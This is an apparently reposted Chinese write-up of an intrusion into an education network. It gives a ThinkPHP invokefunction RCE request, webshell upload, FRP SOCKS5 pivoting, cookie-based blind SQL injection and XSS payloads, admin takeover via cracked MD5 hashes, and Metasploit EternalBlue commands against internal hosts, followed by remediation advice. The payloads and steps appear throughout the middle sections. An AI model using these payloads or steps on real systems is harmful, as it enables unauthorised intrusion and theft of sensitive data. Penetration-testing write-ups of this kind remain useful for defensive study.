记某次EDU从外网打点进内网

admin 2025年4月23日16:02:06评论0 views字数 3704阅读12分20秒阅读模式

第一条:法律依据

  1. 网络安全测试活动必须严格遵守以下法律法规:

    • 《中华人民共和国网络安全法》

    • 《中华人民共和国数据安全法》

    • 《中华人民共和国个人信息保护法》

    • 《计算机信息系统安全保护条例》

    • 《中华人民共和国刑法》相关条款(尤其是第285-287条)

第二条:测试授权

  1. 所有网络安全测试必须事先获得授权
    2.1 对组织内部系统进行测试,应由公司法人授权并备案;
    2.2 对第三方系统进行测试,必须出具由目标系统所有者签署的书面授权书
    2.3 禁止对未授权的公网目标进行探测、扫描、入侵或攻击行为。

这篇很久以前的报道,现在匿名发表,是一篇水文章。利用钟馗之眼和Fofa搜索资产,结合谷歌黑客技术,对该单位进行资产调查。

钟馗之眼语法

指纹搜索:例如:php app:dedecms var:5.7app:组件名称,例如:app:apachever:组件版本,例如:ver:2.0OS:操作系统,例如:os:windowService:服务名称,例如:service:vpnCidr:网段,例如:cidr:0.0.0.1/24Devic:设备名,例如:devic:routerkeyword:关键字查询,例如:keyword:technology尝试弱口令:例如:php app:phpmyadmin...

谷歌黑客技术语法

inurl:example.com intitle:"index of"inurl:example.com intitle:"index of /" "*key.pem"intext:身份证 学院 -site:xxx.edu.cn -site:gov.cn filetype:xls 开放大学

经过一番搜索,整理出的网络安全资产如下

http://xx.xx.xx.xx:9003http://xx.xx.xx.xx:8060http://xx.xx.xx.xx:6580

我发现了一个存在漏洞的网站,而且这个网站有好几个端口,我访问每一个访问,发现9003端口有个ThinkPHP服务,接着我尝试对其进行漏洞攻击,尝试在网站上使用HTTP请求写入phpinfo()文件信息

http://xx.xx.xx.xx:9003//?s=index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=phpinfo&vars[1][1]=0
记某次EDU从外网打点进内网

然后尝试进行网站木马写入

记某次EDU从外网打点进内网

他成功了,并能够在网站上执行该攻击。他为此获取了多个敏感文件+数据库文件。我在这里加了几千点积分。经过搜索,我用蚁剑发现向日葵显示最后一次连接是在28号。

记某次EDU从外网打点进内网

该服务器有多个子网站,我上传了FRP反弹服务器端口工具,配置了Socket5协议,成功连接到服务器内网的网站。访问第一个网站,存在SQL注入,但网站是ASP类型

http://www.xxx.com/XXX_Class.asp?classid=2

测试注入被内置waf拦截

XXX_Class.asp?classid=2'XXX_Class.asp?classid=2'select+union+1,2,3,4/**/--+
记某次EDU从外网打点进内网

此外,这个waf还存在反射型xss

XXX_Class.asp?classid=2'+select+union+1,2,3,4+and(<img/src=""+onerrror=alert(1)>)--+
记某次EDU从外网打点进内网

在Cookie中进行了注入,并通过手动SQL注入注入了几个用户表。为此,我通过解密MD5获取了网站管理员的账户密码

and (select top 1 abs(asc(mid(cstr(password),3,1))) from (select top 1 * from (select top 2 * from admin where 1=1 order by 1) t order by 1 desc)t where 1=1)>48 and 1<2

然后使用网站目录扫描器对这个网站进行目录扫描

记某次EDU从外网打点进内网

成功扫描到网站后台管理地址,然后尝试使用解密后的MD5管理员和账号密码登录

记某次EDU从外网打点进内网

嘭!登录成功,我成功连接到网站管理员

记某次EDU从外网打点进内网

在网站管理栏里可以关闭标签,又一个xss

记某次EDU从外网打点进内网

另外,我使用内网工具扫描了服务器,发现了一些未授权访问漏洞。

记某次EDU从外网打点进内网
记某次EDU从外网打点进内网

然后我们使用Goby漏洞扫描工具扫描整理了几个资产

记某次EDU从外网打点进内网
记某次EDU从外网打点进内网

这些网站中有几个存在 MS17-010 漏洞

记某次EDU从外网打点进内网

这个漏洞利用的方法如下

msf6 > search ms17-010# 使用exploit/windows/smb/ms17_010_eternalblue找到相关模块,索引号为0匹配模块================# 名称 披露日期 等级 检查 描述- ---- --------------- ---- ----- -----------0exploit/windows/smb/ms17_010_eternalblue 2017-03-14 平均 是 MS17-010 EternalBlue SMB 远程 Windows 内核池损坏1exploit/windows/smb/ms17_010_psexec 2017-03-14 正常 是 MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB 远程 Windows 代码执行2辅助/admin/smb/ms17_010_command 2017-03-14 正常 否 MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB 远程 Windows 命令执行3 辅助/scanner/smb/smb_ms17_010 正常 否 MS17-010 SMB RCE 检测4 漏洞利用/windows/smb/smb_doublepulsar_rce 2017-04-14 很好 是 SMB DOUBLEPULSAR 远程代码执行# 使用模块 0msf6 > 使用 0# 您可以使用 show options 查看参数和有效载荷。您会发现,只需为参数设置一个 RHOSTS 目标主机 IP 地址即可。 Payload 有默认值,无需设置。msf6exploit(windows/smb/ms17_010_eternalblue) > show options# 设置 RHOSTS 目标主机 IPmsf6exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 192.168.242.6# 开始攻击run

然后我拿到了几个主机的权限,就结束了。我写了报告,提交给了总部。

1. ThinkPHP 远程代码执行漏洞修复建议

漏洞描述:ThinkPHP存在远程函数调用漏洞,该漏洞可能导致任意代码执行。

将ThinkPHP更新到官方最新版本(建议≥5.1.31或6.x)。

禁用不必要的调试模式(APP_DEBUG => false)。

添加路由白名单限制,防止InvokeFunction等敏感函数泄露。

使用 WAF/IDS 阻止恶意请求模式。

2. 应对弱密码/默认密码风险的建议

漏洞描述:系统/服务存在默认密码或弱密码,可被暴力破解。

为所有服务启用复杂的密码策略(至少12个字符,包括大小写字母、数字和符号)。

禁用默认帐户或更改默认用户名。

启用失败登录锁定和多重身份验证 (MFA)。

定期检查您的帐户密码使用情况。

3. 消除SQL注入漏洞的建议

漏洞描述:通过对输入数据不进行过滤而直接拼接,从而造成SQL注入。

所有输入参数必须使用准备好的语句。

严格限制类型并将传入参数列入白名单。

启用最小数据库权限(例如只读权限,无 DROP 权限)。

使用网络防火墙来阻止注入请求。

4. 消除反射型XSS漏洞的建议

漏洞描述:用户可以创建触发控制界面的恶意脚本。

所有以 HTML 格式输出的内容都必须使用 HTML 实体进行编码。

严格验证 URL、参数和标头中的所有用户输入。

使用 CSP(内容安全策略)来阻止嵌入式脚本的执行。

在浏览器中设置HTTP标头:X-XSS-Protection: 1;模式=阻止。

5. 消除目录/后端地址泄露风险的建议

漏洞描述:未进行路径加固,后台地址可被扫描器检测到。

重命名后端路径并添加动态参数验证。

配置 Nginx/Apache 以限制对控制路径的 IP 地址白名单的访问。

启用登录保护机制,如验证码、双因素身份验证等。

六消除未经授权的访问和机密信息泄露的建议
漏洞描述:部分服务端口默认开放,无需认证,避免信息泄露。

所有服务必须启用访问认证并避免调试输出。

关闭未使用的端口和服务并配置防火墙策略限制。

对敏感文件进行权限隔离、加密、访问日志审计。

七漏洞 MS17-010(永恒之蓝)修复建议
漏洞描述:Windows SMBv1协议存在远程执行漏洞。

将您的系统补丁更新至2017年3月的Microsoft安全更新(KB4012212/KB4012215)。

禁用 SMBv1 协议:

PowerShell
设置 SmbServerConfiguration -EnableSMB1Protocol $false
启用 Windows Defender ATP 来监控 SMB 通信。

禁用网络侧445端口的外部连接。

原文始发于微信公众号(Gh0xE9):记某次EDU从外网打点进内网

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月23日16:02:06
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   记某次EDU从外网打点进内网https://cn-sec.com/archives/3967186.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息